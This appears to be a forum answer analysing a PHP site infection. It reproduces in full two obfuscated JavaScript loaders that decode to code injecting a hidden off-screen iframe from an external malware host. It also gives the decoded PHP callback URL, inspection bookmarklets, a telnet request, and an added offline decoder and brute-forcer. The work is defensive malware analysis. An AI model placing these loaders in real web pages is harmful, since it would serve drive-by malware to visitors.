Unfortunately you did not provide us with the complete JavaScript that the PHP injects (if you still have it, please add it to your question so we can decode it). But thanks a lot for sharing the PHP behind it!!!
Removing the PHP script is indeed the solution, but you should first find out how you got "hacked"/"infected"!
- Maybe a weak password, or rather a new exploit?
- Also, the computers of all developers/maintainers/contributors who have (had) (ftp/admin/cms) access to your site must be checked for password-stealing/sniffing malware (picked up from visiting your own or another infected site).
- A rogue plugin/module installed on your site/server?
- It is also possible that the whole server (and all the sites on it) is compromised. It might be wise to contact your host.
Note that this kind of malware is usually discovered by Google: they add a warning to the index entry of such hacked sites: "This site may harm your computer."
Getting that notice removed requires a "Request a malware review" in Google Webmaster Tools (I don't know whether Google automatically rescans your pages after x time if you don't report them as fixed, nor do I know whether you can report your pages as fixed without Google Webmaster Tools, so beware if you don't want to give Google your mobile phone number!!!).
If one base64-decodes the string aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw from your PHP code, one gets the URL: http://mbrowserstats.com/statE/stat.php
Your infected PHP site uses the above URL with the GET string
?ip=YOUR_IP&useragent=YOUR_BROWSER&domainname=INFECTED_WEBSITE_DOMAIN&fullpath=INFECTED_WEBSITE_PAGE&check='.isset($_GET['look'])
to fetch a custom, unique, on-demand JavaScript to insert into the markup served to the (targeted!!) visitor.
To decode the injected visitor-unique JavaScript payload, I quickly threw together a decoder (which also works on your partial payload, using the character _ as separator and an offset of -7 on these base-16 numbers).
(Partial) string:
10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
decodes to:
if (document.getElementsByTagName('body')[0]){
I'd like to share my analysis of the variant I got, to explain how it works (hoping it helps others):
A website I visited (in Pale Moon = Firefox) suddenly launched Java and popped up a cmd box.
A "view source" of the document showed an obfuscated script that was "served" (inserted) before the <html> tag (with leading whitespace):
<script>w=window;aq="0"+"x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+640!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>
<html>
<head>
<title> etcetera...
Running it through jsbeautifier.org (before I added my manual parsing comments) cleaned it up to:
w = window; //hmmkay, note:reused lateron
aq = "0" + "x"; //so.. '0x', smells like hex
ff = String; //haha, neat, ff is String
ff = ff.fromCharCode; //and ff is now String's fromCharCode method
try {
document["\x62ody"] ^= ~1; //I'm guessing this should fail
} catch (d21vd12v) { //so all the rest gets executed:
v = 123; //bliep? 42? Here be dragons.. aka useless
vzs = false; //ahh, can you guess where this leads?
try { //no idea why this test is here
document;
} catch (q) { //but for an infection this should NOT run
vzs = 1;
}
if (!vzs) e = w["eval"]; //false will become true so e = EVIL
if (1) { //lol, if true, ok...
//ahh, f the payload, an array (by split) of
//640 hex-numbers
f = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74" ["split"](",");
}
w = f; //ahh juggling w to f
s = []; //preparing s to receive the decoded string
for (i = 2 - 2; - i + 640 != 0; i += 1) { //haha, ok: ( 2-2=0; lol; i++ )
j = i; //juggle artist at it again
if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 9); //9 offset
} // 31oct = 19hex = 25 = true, if eval, LOOK MA, WITHOUT parseInt being EVIL
fafa = e; //ok stop juggling. fafa = EVIL
fafa(s) //there we go: EVIL(decoded string)
}
As one can now read, they jump through a lot of hoops to fool virus scanners.
I refactored this (for my own understanding):
w = "/*PAYLOAD: comma separated uni-code characters in hex*/" ["split"](",");
s = '';
for (i = 0; i < 640; i++) {
s += String.fromCharCode( parseInt(w[i],16) + 9 ); //decode
}
eval(s) //execute
Using my decoder (set to base 16, separator character , and offset 9) the payload decodes to:
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751');f.style.left='-10000px';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
document.getElementsByTagName('body')[0].appendChild(f);
}
Note that this generated code was indented with 2 and 3 tabs (amateur, or fooling virus scanners?), which I removed for readability. Line endings were also CR (13 dec) (is the author/script kiddie using an older Mac?).
So, now we have all the code to (finally) explain simply what happens:
- the PHP script curls a visitor/site-unique JavaScript to inject into the served markup,
- this (via PHP) injected JavaScript injects an iframe into the document body (with a little help from the browser, since the body does not exist yet), positioned (in the visitor's browser) -10000px from the left of the visited page (out of sight), and
- the injected iframe loads an external page, specifically targeted at (the user and the site the user is visiting), containing god knows what kind of mess/malware/virus/rootkit (in my case from rotatethespin.com:8000, muruno-vaser.info:8000 and epomota.com).
I also verified this by grabbing the live HTML of the document with this bookmarklet:
javascript:(function(){ alert(document.documentElement.innerHTML); })()
which also showed the injected iframe code in the source.
I used the next bookmarklet to move the iframe into view (assuming there is only 1 iframe):
javascript:(function(){ document.getElementsByTagName('iframe')[0].style.left='0px'; })()
Naturally one could also use Firebug and similar tools (depending on the browser).
I also noticed that when using most web-based tools (even the W3C validator) to fetch the source of an infected site, the PHP does not insert the JavaScript, making the site look uninfected!
I also ran into this "problem" when trying to (safely) fetch the infected code with a simple telnet command. However, after seeing the PHP code behind it, I realized I had rarely used the HTTP headers before (specifically the referer).
Doing: telnet infected-site.com 80
and then pasting the following finally gave the infected markup source:
GET /path.php?page=something HTTP/1.1
Host: infected-site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Referer: http://infected-site.com/index.php
Connection: close

Note that this way one can also safely explore (and reverse-engineer) the source of the iframes etc.!
I also noticed that the site owner's computer did not receive the infected code either! This is either because his machine is infected, or because the server distributing the JavaScripts does not serve the script because it knows the client machine is already infected.
UPDATE: Having a working set of tools from this answer, I re-checked the site in question today (after a good night's sleep) and a completely different script is injected (but still based on the same techniques explained in this answer).
<script>ss=eval("Str"+"ing");d=document;a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>
Note that this time the numbers are octal (base 8) (separated by , with an offset of -4).
So I updated my decoder to include a base/radix setting (and all relevant links in this answer), and can see that the payload is still the same (except for the domain it points to).
I found this question by googling document\["\x62ody"\] ^= ~1, which gave 834 (mostly useless/infected) results.
The malware I stumbled upon today has the above string and the very unique string 'd21vd12v' in it, which gives 8300 (also mostly useless/infected) results.
However, googling '//this code is used for global bot statistics' (found in the PHP you provided in your question) rendered over 4.1 million results (going back to at least 2010), indicating that WordPress, Joomla, etc. are also victims of this 'technique'.
Reading some of those links (like this, this or this) I get the impression that this started out as a way to fool search engines (like Google) to boost page rank. This at the cost of creating a self-inflicted malware vulnerability.
Naturally, the variants that specifically distribute malware now try to hide themselves from search engines.
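The three number-list encodings taken apart by hand in the answer above (hex with offset +9, octal with offset -4, and the questioner's '_'-separated hex with offset -7) are all one scheme: split on a separator, parse each token in some base, add a constant, feed the result to String.fromCharCode. The following JavaScript is an added example, not code from the answer or from the malware author. It implements that decoder once, generically, and adds a brute-forcer that recovers the base and offset by itself, so one does not have to read the deliberately mangled loader to find the `+9` or the `-(7-3)`. The marker-word heuristic and the function names are this example's own assumptions; the three sample inputs are short prefixes copied from the payloads quoted on this page (the full payloads are not reproduced), and the whole thing runs offline.

```javascript
// Added example (not the answer's or the malware author's code): generic decoder
// and parameter brute-forcer for "separated numbers in some base + fixed offset"
// obfuscation, as seen in the three variants quoted on this page.

// Sample inputs: prefixes copied from the payloads quoted above.
// - the hex/+9 variant: f = "0,0,60,5d,..."
// - the octal/-4 update: a = ("15,15,155,152,...")
// - the questioner's '_'-separated hex/-7 fragment
const HEX_PLUS9 = '0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74';
const OCT_MINUS4 = '15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201';
const HEX_MINUS7 = '10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10';

// Decode one separated number list: parse every token in `base`, add `offset`,
// and turn the result into a character (what the loaders do via fromCharCode).
// parseInt stops at the first digit that is invalid in `base`; a token with no
// valid leading digit yields NaN and is dropped. A wrong base therefore produces
// garbage instead of throwing, which is what the brute-forcer below relies on.
function decodePayload(list, base, offset, sep) {
  let out = '';
  for (const tok of list.split(sep)) {
    if (tok === '') continue;
    const n = parseInt(tok, base);
    if (Number.isNaN(n)) continue;
    out += String.fromCharCode(n + offset);
  }
  return out;
}

// The decoded payloads on this page were tab-indented with CR line endings;
// normalise to LF and strip leading whitespace, as the answer did before reading.
function normalize(text) {
  return text
    .split(/\r\n|\r|\n/)
    .map((line) => line.replace(/^[\t ]+/, ''))
    .join('\n');
}

// Heuristic (this example's assumption): a dropper has to spell out DOM/JS calls,
// so a decode that contains them is almost certainly the right base/offset.
// Try plausible bases and a window of offsets, rank by number of marker hits.
const MARKERS = ['document', 'function', 'iframe', 'window', 'eval', 'script'];

function guessParameters(list, sep) {
  const hits = [];
  for (const base of [8, 10, 16]) {
    for (let offset = -64; offset <= 64; offset++) {
      const text = decodePayload(list, base, offset, sep);
      const markers = MARKERS.filter((m) => text.includes(m));
      if (markers.length > 0) hits.push({ base, offset, markers, text });
    }
  }
  hits.sort((a, b) => b.markers.length - a.markers.length);
  return hits.length > 0 ? hits[0] : null;
}

// Stand-alone run: recover the parameters of each sample and show the decode.
for (const [name, list, sep] of [
  ['hex/+9', HEX_PLUS9, ','],
  ['octal/-4', OCT_MINUS4, ','],
  ['hex/-7', HEX_MINUS7, '_'],
]) {
  const g = guessParameters(list, sep);
  console.log(name, '->', g ? `base ${g.base}, offset ${g.offset}` : 'no match');
  if (g) console.log(normalize(g.text));
}
```

Running it prints `base 16, offset 9`, `base 8, offset -4` and `base 16, offset -7` for the three samples, each followed by the same `if (document.getElementsByTagName('body')[0]){` opening the answer arrived at by hand. Because the brute-forcer only needs the number list and the separator, it works unchanged when the next variant swaps the base or offset again, which is exactly what the UPDATE in the answer describes; it does not run the payload, so it is safe to apply to anything fetched with the telnet trick above.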